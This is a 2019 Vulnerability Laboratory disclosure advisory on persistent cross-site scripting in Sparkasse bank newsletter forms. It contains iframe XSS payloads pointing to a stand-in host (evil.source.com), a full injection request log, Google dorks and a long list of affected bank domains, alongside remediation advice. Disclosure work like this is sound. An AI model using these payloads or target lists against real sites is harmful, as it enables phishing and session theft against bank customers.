Document Title: =============== Sparkasse - Multiple Persistent Cross Site Scripting Web Vulnerabilities
References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2173 Release Date: ============= 2019-03-07 Vulnerability Laboratory ID (VL-ID): ==================================== 2173 Common Vulnerability Scoring System: ==================================== 4.6 Vulnerability Class: ==================== Cross Site Scripting - Persistent Product & Service Introduction: =============================== A savings bank is a credit institution with the task of offering opportunities to broad sections of the population. to offer financial investment, to carry out payment transactions and to meet local credit needs. to satisfy the needs of small and medium-sized enterprises as well. (Copy of the Homepage: https://en.wikipedia.org/wiki/Sparkasse ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the Sparkasse online service web-application. Vulnerability Disclosure Timeline: ================================== 2018-10-25: Researcher Notification & Coordination (Security Researcher) 2018-10-26: Vendor Notification (S-CERT Department) 2018-10-29: Vendor Response/Feedback (S-CERT Department) 2019-02-20: Vendor Fix/Patch (Service Developer Team) 2018-**-**: Security Acknowledgements (S-CERT Department) 2019-03-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Sparkasse Product: Mailing Server - Online Service (Web-Application) 2018 Q4 - 2019 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== No authentication (guest) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Program Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official sparkasse online service newsletter web-application. Local low privileged user accounts are able to inject own malicious script codes on the application-side of the vulnerable service module. The vulnerability is located in the `firstname`, `lastname` and `companyname` values of the `newsletter` module. The vulnerable parameters are f[1][v], f[2][v] & f[2][v]. Remote attackers are able to inject own malicious script code via POST method request to the application-side of the sparkasse dns domain mailing service. The attack vector of the vulnerability is persistent on the application-side and the request method to inject is POST. The attacker does not need to be directly authenticated because its only an initial registration without direct activiation request. The injection point are the vulnerable input fields and the execution of the malform injected code takes place in the `mailing.sparkasse.de` or unique `*sparkasse.de` domains by a client-side GET method request. The issue affects all pages listed with the newsletter module. Thus lead to an integration to all the different domains by the involved service provider. Now the vulnerability is all over in the sparkasse domains and allows email spoofing, phishing, cross site requests for redirect to malware or exploits and persistent manipulation of sparkasse domain (dbms) contents. Due to a crawl we identified a large list of affected web-applications from sparkasse by usage of different google dork methods. A targeted user can not see that the manipulated website is insecure because of the trusted native source that deliveres the contexts over the sparkasse mailing api. The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system v3) count of 5.2. The exploitation of the persistent input validation web vulnerability requires low user inter action and no privileged application user account. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources and persistent manipulation of affected or connected web module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Newsletter Vulnerable Input(s): [+] Vorname [+] Nachname [+] Firmenname Vulnerable Parameter(s): [+] f[1][v] [+] f[2][v] [+] f[3][v] Affected Domain(s): [+] mailing.sparkasse.de [+] other unique domains like news.sparkasse ... Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers with low privileged application user account and medium required user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Google Dorks: allinurl:sparkasse /de/home/service/newsletter.html allinurl:sparkasse newsletter.html?n=true Google Dork URL: https://www.google.com/search?q=allinurl:sparkasse+/de/home/service/newsletter.html https://www.google.com/search?q=allinurl:%3Asparkasse+newsletter.html?n?true Payload: Phishing test"><iframe src=http://www.evil.source.com/poc.html></iframe> Payload: Session Hijacking test"><iframe src=http://www.evil.source.com/ onload=alert(document.cookie)></iframe> test"><iframe src=http://www.evil.source.com/ onload=alert(document.domain)></iframe> Payload: Malware or Exploit test"><iframe src=http://www.evil.source.com/poc.js></iframe> Payload: Redirect test"><window.frames["myFrame"].location = "http://...";> PoC: Demo URLs (Examples) https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1 https://mailing.sparkasse.de/-viewonline2/6511/457/1029/961H3567/80CK9NcUj9/1 https://news.sparkasse-allgaeu.de/-viewonline2/6620/759/2129/tmBn69YJ/kU02LY1vXk/1 --- PoC Session Logs (POST) [Inject] --- https://www.sparkasse-aachen.de/content/myif/spk-aachen/work/filiale/de/home/misc/vps/gate/_jcr_content.bin/emma/api/rest/39050000/optinsetup/5/form Host: www.sparkasse-aachen.de User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 324 Cookie: JSESSIONID=0000IkwJ8m_99MAwctzQGQvKqQ7:559eb1d1d; IF6CONTEXT=SVBTVEFOREFSRDozOTA1MDAwMDpkZTpJRjpmYWxzZTpzcGstYWFjaGVu; IFCLONE=559eb1d1d; IF_SPKDE_CHECK=SPKDE_CHECK; vpi-3117116-SPKDE16=rd901o00000000000000000000ffffac10c6c0o80; vpi-3117116-emma_session=eyJpdiI6IlZTV3o5bVNtMm5hOCthNm9cLzRvOEVnPT0iLCJ2YWx1ZSI6IjNCNTZQYnZNT2tDUkpZZTREQ01pTGtKVllLRUd0ZjQwYkhHSTExalErNm RqMzV2QTBcL3hDc1wvSndUXC9YNk5rK0tQOEF6UGRrR2JHcEgzNCtMZVg4QitRPT0iLCJtYWMiOiIwNTdlZDUzMWU1NGUzNTBkZDkxMTE1MTk5OWRmMWI2ZDRmMmY1M TEzMzdmM2E0MDMxZTMyZmFkMjdjZThkNTIxIn0%3D Connection: keep-alive f[0][i]=1&f[0][v]=crackswafslikeatingpopc...@vulnerability-lab.com&f[1][i]=5&f[1][v]=a<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)>&f[2][i]=7&f[2][v]=b<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)> &f[3][v]=<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)>[i]=11&f[3][v]=1&l[]=1,5,3,9,7,37 - POST: HTTP/1.1 200 OK X-UA-Compatible: IE=edge Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff Vary: Accept-Encoding,User-Agent Cache-Control: no-cache Content-Length: 59 Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Language: de-DE --- PoC Session Logs (GET) [Execute] --- https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1 Host: mailing.sparkasse.de User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Cookie: SPK_COOKIE=YmFua2NvZGU9NzY1NTAwMDA%3D; TCPID=118104211048178479492; s_fid=65EF7EF7E0BBFBFC-20A9728F3A9D422B; s_cc=true; TC_OPTOUT=0@@@017@@@ALL; s_sq=spfgmbhsdeprod%3D%2526c.%2526a.%2526activitymap.%2526page%253Dservice%25253 Afilialsuche%2526link%253D%2525C3%252584ndern%2526region%253Dbank%2526pageIDType%253D1%2526.activitymap%2526.a%2526.c Connection: keep-alive Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset="UTF-8" Connection: close Vary: Accept-Encoding Content-Encoding: gzip PoC: Source (Email & Web Pages) <table style="margin:0px auto; width:600px;" class="c100" width="600" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center"> <tbody><tr><td colspan="3" height="25"> </td></tr> <tr> <td class="c5" width="25"> </td> <td class="c90" width="550" valign="top"> <table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff"> <tbody><tr> <th style="font-weight: normal;" class="col" valign="top" align="left"> <table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff"> <tbody><tr> <td style="font-family:Arial, Helvetica, sans-serif; font-size:12px; line-height:18px; color:#333333;" align="left"> <strong>Sehr geehrte Frau b"><iframe>%20>"<iframe src=evil.source>[EXECUTION POINT!],</strong><br /><br /> waren Sie bereits im Urlaub oder stehen Ihnen die schönsten Tage des Jahres noch bevor? In unserem ersten Beitrag berichten wir über die aktuellen Urlaubstrends der Deutschen. Die praktische App Kwitt können Sie das ganze Jahr über nutzen. Lesen Sie, wie einfach es mit dieser Anwendung innerhalb Ihrer App „Sparkasse“ ist, Geld von Handy zu Handy zu überweisen, und sei es, um die Rechnung vom letzten Besuch bei Ihrem Lieblingsitaliener zu teilen. Außerdem informieren wir Sie unter anderem darüber, wie Sie am besten vorgehen, wenn Sie im Urlaub Grund zu einer Reklamation haben. <br> </td> </tr> Affected Domain(s): =================== Sparkasse Domains: https://www.sparkasse-ansbach.de/de/home/service/newsletter.html?n=true https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true https://www.sparkasse-wiehl.de/de/home/service/newsletter.html?n=true https://www.sparkasse-vogtland.de/de/home/service/newsletter.html?n=true https://www.sparkasse-allgaeu.de/de/home/service/newsletter.html?n=true https://www.sparkasse-iserlohn.de/de/home/service/newsletter.html?n=true https://www.sparkasse-wuppertal.de/de/home/service/newsletter.html?n=true https://www.sparkasse-offenburg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true https://www.sparkasse-ffb.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true https://www.sparkasse-freiburg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-landshut.de/de/home/service/newsletter.html?n=true https://www.sparkasse-emh.de/de/home/service/newsletter.html?n=true https://www.sparkasse-krefeld.de/de/home/service/newsletter.html?n=true https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true https://www.sparkasse-moenchengladbach.de/de/home/service/newsletter.html?n=true https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true https://www.sparkasse-adl.de/de/home/service/newsletter.html?n=true https://www.sparkasse-holstein.de/de/home/service/newsletter.html?n=true https://www.sparkasse-luedenscheid.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dueren.de/de/home/service/newsletter.html?n=true https://www.sparkasse-heidelberg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-hochsauerland.de/de/home/service/newsletter.html?n=true https://www.sparkasse-saarbruecken.de/de/home/service/newsletter.html?n=true https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dortmund.de/de/home/service/newsletter.html?n=true https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true https://www.sparkasse-hanau.de/de/home/service/newsletter.html?n=true https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true https://www.sparkasse-pfaffenhofen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-fuerth.de/de/home/service/newsletter.html?n=true https://www.sparkasse-donnersberg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-freising.de/de/home/service/newsletter.html?n=true https://www.sparkasse-neumarkt.de/de/home/service/newsletter.html?n=true https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html https://www.sparkasse-suew.de/de/home/service/newsletter.html?n=true https://www.sparkasse-celle.de/de/home/service/newsletter.html?n=true https://www.sparkasse-neuss.de/de/home/service/newsletter.html?n=true https://www.sparkasse-bielefeld.de/de/home/service/newsletter.html?n=true https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true https://www.sparkasse-bamberg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dieburg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-soestwerl.de/de/home/service/newsletter.html?n=true https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true https://www.sparkasse-emsland.de/de/home/service/newsletter.html?n=true https://www.sparkasse-kehl.de/de/home/service/newsletter.html?n=true https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true https://www.sparkasse-neunkirchen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-lev.de/de/home/service/newsletter.html?n=true https://www.sparkasse-vorderpfalz.de/de/home/service/newsletter.html?n=true https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html?n=true https://www.sparkasse-zollernalb.de/de/home/service/newsletter.html?n=true https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true https://www.sparkasse-pforzheim-calw.de/de/home/service/newsletter.html?n=true https://www.sparkasse-wa-fkb.de/de/home/service/newsletter.html?n=true https://www.sparkasse-co-lif.de/de/home/service/newsletter.html?n=true https://www.sparkasse-elmshorn.de/de/home/service/newsletter.html?n=true https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true https://www.sparkasse-amberg-sulzbach.de/de/home/service/newsletter.html?n=true https://www.sparkasse-lippstadt.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-olpe.de/de/home/service/newsletter.html?n=true https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true https://www.sparkasse-finnentrop.de/de/home/service/newsletter.html?n=true https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true https://www.sparkasse-blomberg.de/de/home/service/newsletter.html?n=true https://www.sparkasse-darmstadt.de/de/home/service/newsletter.html?n=true https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true https://www.sparkasse-bodensee.de/de/home/service/newsletter.html?n=true https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true https://www.sparkasse-herford.de/de/home/immobilien/newsletter.html?n=true https://www.sparkasse-hannover.de/de/home/ihre-sparkasse/newsletter.html?n=true https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true https://www.sparkasse-mittelfranken-sued.de/de/home/ihre-sparkasse/newsletter.html?n=true https://www.sparkasse-lemgo.de/de/home/privatkunden/junge-leute/flexibel-durchstarten/S-Club/anmeldung-newsletter.html?n=true https://www.sparkasse-rhein-neckar-nord.de/de/home/ihre-sparkasse/ihre-sparkasse-vor-ort/newsletter.html?n=true Sparkasse Unique Domains: https://www.berliner-sparkasse.de/de/home/service/newsletter.html?n=true https://www.herner-sparkasse.de/de/home/service/newsletter.html?n=true https://www.foerde-sparkasse.de/de/home/service/newsletter.html?n=true https://www.rhoen-rennsteig-sparkasse.de/de/home/service/newsletter.html?n=true https://www.ksk-walsrode.de/de/home/service/newsletter.html?n=true https://www.ospa.de/de/home/ihre-sparkasse/newsletter.html?n=true Sparkasse Muster Systems & Partners: https://partner.meine-sparkasse.de/partner/69051620/58/?blz=69051620&site= https://sparkasse-musterstadt.if-einblick.de/de/home/service/newsletter.html?n=true https://sparkasse-musterstadt-svrp.if-einblick.de/de/home/service/newsletter.html?n=true https://sparkasse-musterstadt-sgvht.if-einblick.de/de/home/service/newsletter.html?n=true Solution - Fix & Patch: ======================= 1. The vulnerability can be patched by a parse and encode of the vulnerable `firstname`, `lastname` and `companyname` input fields in all the affected newsletter by an automated or manual update. Ask Sparkasse Kassel after the first incident they resolved the issue. 2. Restrict the affected input fields and disallow the usage of special chars to prevent malicious script code injection attacks. 3. Escape or safe encode the name parameter content in the html generated template on the affected sparkasse mailing or unique domain page. 4. Sanitize in the outgoing emails through the sparkasse server the affected name parameters to finally resolve the vulnerability. 5. Integrate a secure process to gain knowledge of any vulnerability that is tracked and reported to banks or in the patch cycle to ensure that vulnerability issues cannot become major infrastructure issues overnight. Note: The issue has been reported to the finance informatic in 2018 q4 and was forwarded to the s-cert team of the sparkasse without any response. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the web-application module is estimated as medium. The vulnerability can be used to produce malicious and malformed content to phish or exploit user session data the easy way. The targeted users can not see that the delivered contents are not from the original sparkasse source. Credits & Authors: ================== Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri (https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
